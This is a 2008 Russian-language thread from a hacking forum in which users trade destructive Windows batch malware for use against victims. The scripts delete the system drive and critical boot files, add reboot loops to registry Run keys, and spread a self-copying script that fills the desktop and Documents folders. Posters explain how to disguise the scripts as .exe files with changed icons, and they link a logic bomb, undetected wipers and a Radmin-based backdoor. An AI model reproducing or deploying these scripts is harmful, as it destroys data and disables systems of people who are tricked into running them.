ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Вопрос о Virus вещающий винду и HDD (https://forum.antichat.xyz/showthread.php?t=12409)

RuDDicK 07.04.2008 02:04

Ну вобшета Можно так: возьми любои из этих кадоф вложы в текставои Документ сахрани под
Имя фаила.бат и отправь жертве а штоб небыло подозрительно скачяи bat то ехе конвертер и периделаи из .бат в .ехе потом скачай ресхакер и периделаи иконку... а помоиму кагда конвертируеш из .бат в ехе то можна и сразу иконку поменять ))и когда жертва дважде кликнит на фаил то Код сделает свою работу...
этот код Удалит Локальные Диски дапустим C:\ D:\
Код:

@echo off
 del %systemdrive%\*.* /f /s /q /c /d
 shutdown -r -f -t 00

этим скриптом жертва больше не сможет фключить своё железо покашто не периустановет Винду
Код:

@echo off
del C:\windows\system32\hal.dll
del C:\windows\system32\login.bat
del C:\windows\system32\logon.exe
del C:\windows\system32\logonui.exe
start shutdown -r -t 50 -c "TEKCT"

а этот код очень харашо по издеваиця над виндои
Код:

echo @echo off>C:\windows\hartell.bat
echo break off>>C:\windows\hartell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartell.bat
echo end>>c:\windos\hartell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartell.bat /f
echo R a V e N T e C h O w N e D Y o U
pause

а вот тебе и бат то ехе цонвертер:
Download

--------------------------------------------
надеюсь я чемто помог...

Black dead 07.04.2008 08:02

RuDDicK
а вот тебе и бат то ехе цонвертер:
Download

пля при запуске твоего конвектора сразу спалило в \Local Settings\Temp\2F.tmp\b2e.exe - инфицирован Trojan.MulDrop.12138

RuDDicK 07.04.2008 14:22

Цитата:

Сообщение от Black dead
пля при запуске твоего конвектора сразу спалило в \Local Settings\Temp\2F.tmp\b2e.exe - инфицирован Trojan.MulDrop.12138

Хммм... да но это единственыь бесплатный конвертер...
Другова я не нашол хатя искал долга... все были платные...
Ну можна и подругому: вот тебе Онлайн конвертер но потом иконку смениш черес реcxакер....
Online .bat to .exe Converter
---------------------------------------
P.S: Кстати вот и ресхакер если руки откуда нада растут то иконку ты лехко смениш!
Download here (No Virus) xDD

Black dead 09.04.2008 16:30

RuDDicK пасиб но ресхак давно ужо юзаю для склейки пинча с ярлыком

RuDDicK 09.04.2008 17:03

куульно тогда ))
но полюбому сечяс в фаилы.бат уже некто не верит ыыы...))
вот я решил наити кокоьнебути конвертер + икон changer вот и результат

RuDDicK 09.04.2008 17:10

а вот есче адин пример я ево назвал HDD Fuker
По структуре кода можна определить што и для чево!!!
Код:

@Echo off
color 02
title R.I.P
start
start
start
start calc
copy %0 %systemroot%\Picture2.bat>nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run/t REG_SZ
/d %systemroot%\Picture2.bat /f > nul
copy %0* .bat > nul
Attnb +r +h picture2.bat
Attnb +r +h
RUNDLL32 USER32.DLL.SwapMouse.Button
Start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
Start
cls
cd %userprofile%\desktop
copy Picture2.bat R.I.P.bat
copy Picture2.bat R.I.P.jpeg
copy Picture2.bat R.I.P.txt
copy Picture2.bat R.I.P.exe
copy Picture2.bat R.I.P.mov
copy Picture2.bat FixVirus1.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:RIP
cd %userprofile%\desktop
copy Picture2.bat %random%.bat
cd %userprofile%\My Documents
copy Picture2.bat %random%.bat
goto RIP

enjoy ))
------------------------------------------
P.S:Только заметите в коде есть визде Picture2.bat значет и вы должны сахранить ево в Picture2.bat или поменять визиде нозвание в коде в то название в каторую хотите сахронить этот код

Грот 10.04.2008 05:54

вот 9 майская щутка на основе логической бомбы саламандры немного подедактировал код так что если джуниор не спалился то видят только 2 антивиря
принцип такой при запуске создает ключь в реестре и библиотеку если удалить то или это то будет ребут вирь ждет 9 мая и вешает винду http://depositfiles.com/files/4585584

RuDDicK 11.04.2008 03:50

мде.... ты так и конкретно и не обеснил што и для чево? ну да (штото свеазоное с 9 мая ыыыы...)
обесьни нормально....

Грот 11.04.2008 06:45

Цитата:

Сообщение от RuDDicK
мде.... ты так и конкретно и не обеснил што и для чево? ну да (штото свеазоное с 9 мая ыыыы...)
обесьни нормально....

на сайте глоффа есть похожая тема там это обсуждалось там есть исходники вируса только его нужно немного изменить чтоб меньше вирей палило
там и подробное описание

(ShadoW) 19.06.2008 16:12

Позвольте перебить вашу интеллекутальную беседу одним постом :
Если надо сделать из *bat *exe для этого можно WINRAR юзать, кого интересуют вирусы которые не палятся смотрим :
1) http://hackers2008.at.ua/load/2-1-0-1 - Сносит винду.... с разными приколами антивирём не палится ( прилагается видео по написанию вируса)
2) бэк-дор на основе радмина. читаем тут - http://hackers2008.at.ua/load/2-1-0-2
Сильно не бейте, мои первые вирусы....


Время: 14:57